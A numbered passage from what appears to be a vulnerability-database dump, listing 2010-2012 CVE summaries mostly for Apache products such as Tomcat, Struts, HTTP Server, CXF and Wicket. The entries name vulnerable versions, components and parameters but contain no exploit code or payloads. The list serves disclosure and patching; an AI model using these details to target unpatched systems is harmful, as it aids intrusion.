12494| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
12495| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
12496| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
12497| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
12498| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
12499| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
12500| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
12501| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
12502| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
12503| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
12504| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
12505| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
12506| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
12507| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
12508| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
12509| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
12510| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
12511| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
12512| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
12513| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
12514| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
12515| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
12516| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
12517| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
12518| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
12519| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
12520| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
12521| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
12522| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
12523| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
12524| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
12525| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
12526| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
12527| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
12528| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
12529| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
12530| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
12531| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
12532| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
12533| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
12534| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
12535| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
12536| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
12537| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
12538| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
12539| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
12540| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
12541| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
12542| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
12543| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
12544| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
12545| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
12546| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
12547| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
12548| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
12549| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
12550| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
12551| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
12552| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
12553| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
12554| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
12555| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
12556| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
12557| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
12558| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
12559| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
12560| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
12561| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
12562| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
12563| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
12564| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
12565| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
12566| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
12567| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
12568| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
12569| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
12570| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12571| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
12572| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
12573| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
12574| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
12575| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
12576| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
12577| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
12578| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
12579| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
12580| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
12581| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
12582| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
12583| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
12584| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
12585| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
12586| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12587| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
12588| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
12589| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
12590| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
12591| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
12592| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
12593| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
12594| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
12595| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
12596| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
12597| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
12598| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
12599| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
12600| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
12601| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
12602| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
